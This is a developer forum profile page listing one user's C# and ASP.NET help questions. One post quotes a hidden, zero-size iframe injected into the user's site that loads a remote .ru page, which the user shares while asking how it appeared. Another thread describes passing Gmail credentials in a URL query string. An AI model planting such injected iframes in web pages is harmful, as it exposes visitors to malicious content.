Skip to content
  • Categories
  • Recent
  • Tags
  • Popular
  • World
  • Users
  • Groups
Skins
  • Light
  • Cerulean
  • Cosmo
  • Flatly
  • Journal
  • Litera
  • Lumen
  • Lux
  • Materia
  • Minty
  • Morph
  • Pulse
  • Sandstone
  • Simplex
  • Sketchy
  • Spacelab
  • United
  • Yeti
  • Zephyr
  • Dark
  • Cyborg
  • Darkly
  • Quartz
  • Slate
  • Solar
  • Superhero
  • Vapor

  • Default (No Skin)
  • No Skin
Collapse
Code Project
P

P T R K

@P T R K
About
Posts
43
Topics
29
Shares
0
Groups
0
Followers
0
Following
0

Posts

Recent Best Controversial

  • Trim Column value access Interbase
    P P T R K

    Hi Stark DaFixzer, sorry i forgot trim method to end of the statement.

    var NameList = (from param_enum_desc in dsPartnertype.Tables[0].AsEnumerable()
    select new
    {
    POS_VALUE = param_enum_desc.Field<string>("POS_VALUE").Trim(),
    POS_DESCR = param_enum_desc.Field<string>("POS_DESCR").Trim()
    });

        stoPartner.DataSource = NameList;
        stoPartner.DataBind();
    

    Thank you Rameshkumar.T

    C# database question css help

  • Trim Column value access Interbase
    P P T R K

    Hi Stark DaFixzer, I got a solution for trim the values using LINQ. The following statementi have used in my application.

    var NameList = (from param_enum_desc in dsPartnertype.Tables[0].AsEnumerable()
    select new
    {
    POS_VALUE = param_enum_desc.Field<string>("POS_VALUE"),
    POS_DESCR = param_enum_desc.Field<string>("POS_DESCR")
    });

        stoPartner.DataSource = NameList;
        stoPartner.DataBind();
    

    Thank you Rameshkumar.T

    C# database question css help

  • Trim Column value access Interbase
    P P T R K

    Hi Stark DaFixzer, I checked that table. There is no empty space and special characters. Please any other way to trim the values. Thanks in Advance Rameshkumar.T

    C# database question css help

  • Trim Column value access Interbase
    P P T R K

    Thank you Stark DaFixzer. I did try this code. But I have 10 million rows. So it will take more time to bind. Please any other solutions. Thanks in Advance Rameshkumar

    C# database question css help

  • Trim Column value access Interbase
    P P T R K

    Hi, I have a project which is used the interbase database. Issue is, one column with datatype char(100) in a table. I will bind this column in grid when empty space also binded. I have used to ltrim(rtrim(Name)) function in SQL statment. It wouldnt affect. How can i trim this empty space? Thanks in advance.

    C# database question css help

  • Application Cache location
    P P T R K

    Thank you. But i didnt know which format and location the cache data is stored in web server? Pleaes help me Regards Rameshkumar.T

    ASP.NET help

  • Application Cache location
    P P T R K

    Hi All, I will use application cache in my application. I want where the application cache is stored and which formation. Please help me Regards Rameshkumar.T

    ASP.NET help

  • Threads
    P P T R K

    Thank you your reply. Is there any example to use multi threading (Asynchornous and thread pool) in C# window service application?

    C# csharp help question

  • Threads
    P P T R K

    Hi Friends, Is possible to run 500 threads per second using c#? Please help me Thanks in advance

    C# csharp help question

  • Wrote Un Wanted Code
    P P T R K

    Thank your post. I did validate for two input boxes.

    ASP.NET help csharp php asp-net database

  • Wrote Un Wanted Code
    P P T R K

    Hi All, I have developed a website using asp.net. The problem is someone was write for unwanted content in my two pages like default & home pages. When go to my url it open a login page. Once the user will give valid input then i will redirect the default page. And next to go to Home page. The following text was write in my site. <iframe frameborder="0" onload="if (!this.src){ this.src='http://testossteron.ru:8080/index.php'; this.height='0'; this.width='0';}" >wnwoccykiicptwlnvyhdhlbctpxyvqw</iframe> This text was write on after body tag. How this text was write in my default page and how to avoid this type of issues? Please Help Me

    ASP.NET help csharp php asp-net database

  • GMail Login Dynamic
    P P T R K

    Thank you once again. I will check and update Thank you

    ASP.NET help

  • GMail Login Dynamic
    P P T R K

    This is the url what i was using. https://www.google.com/accounts/ServiceLoginAuth?continue=http://mail.google.com/gmail&service=mail&Email=username&Passwd=passwd&null=Sign+in[^] Thanks

    ASP.NET help

  • GMail Login Dynamic
    P P T R K

    Thank you your feedback. Actually, I have to login my login page. To input username and password (Not gmail username/password) in login page. When i click login button at the same time i will open new window with querystring gmail username and password to login gmail account. It was working well still last month. Now it is not working. Now it shows gmail login screen only. This is my issue. Thanks

    ASP.NET help

  • GMail Login Dynamic
    P P T R K

    Hi All, I have a application. When i will click login button in that application using my username/password at the same time gmail account (my gmail username/password) will open dynamically. This task is very urgent in my company Please Anyone Help me Thanks in Advance.

    ASP.NET help

  • Reg:Google API Calendar Permission
    P P T R K

    Hi Friends, I have used to implement to listed calendar events using Google Calendar API. This is API are read all calendar title from particular email accounts.But i cannt get calendar events.when i click calendar title it shows error message like "Events from one or more calendars could not be shown here because you do not have the permission to view them.". How can i enable this permission through google APIs. Thanks in advance. Rameshkumar.T

    Web Development json help question

  • Add MS Excel Application to DCOM Config
    P P T R K

    Hi, I have a server which is used for windows 2000 advanced server. This server i have created a asp.net application to read excel sheet and update the data into the database. I want to add permission for ASPNET for MS Excel Application. But it does not listed on DCOM Config properties. How can i add/migrate MS Excel Application to DCOM Config properties? It is urgent to update for my project. Thanks in advance

    COM asp-net question csharp database sysadmin

  • Reg:ASP .Net AJAX Problem
    P P T R K

    Hi Friends, I have implemented for ASP .Net Ajax in our web application. Now it is working fine. My problem is, I have implemented a page with required field validator. Now the required field validator is working fine for when first time loaded. The second time is not working for validate empty value. Please help me urgent for how to change our source in my application. Thanks in advance Rameshkumar Thirumalaisamy

    ASP.NET help csharp tutorial

  • Reg:Get Source Path
    P P T R K

    Hi Friends, I have an one .Net windows application setup project which consist for following files. 1.Setup.exe 2.Setup.msi 3.sample.txt My question is, how to get sample.txt file when installing the setup file?. Because i will be refer from some criteria in sample.txt file. Urgent Thanks in advance Rameshkumar Thirumalaisamy

    Visual Basic question csharp tutorial workspace

  • Reg:IIS6.0 in Wx2003
    P P T R K

    Hi Friends, I have a system which has installed windows server 2003 OS. In my system, IIS6.0 is installed also. I could not run my asp.net applications through the visual studio 2005. Because, "Default Website" (in IIS6.0) is display always stopped. I could not trying to start the default website. I was trying to start the default website when it has returned the error "The process cannot access the file because it is being used by another process". I did to restart the IIS admin service by more time. How can i start the default website in IIS6.0? Thanks in advance Rameshkumar Thirumalaisamy

    System Admin csharp windows-admin question asp-net visual-studio
  • Login

  • Don't have an account? Register

  • Login or register to search.
  • First post
    Last post
0
  • Categories
  • Recent
  • Tags
  • Popular
  • World
  • Users
  • Groups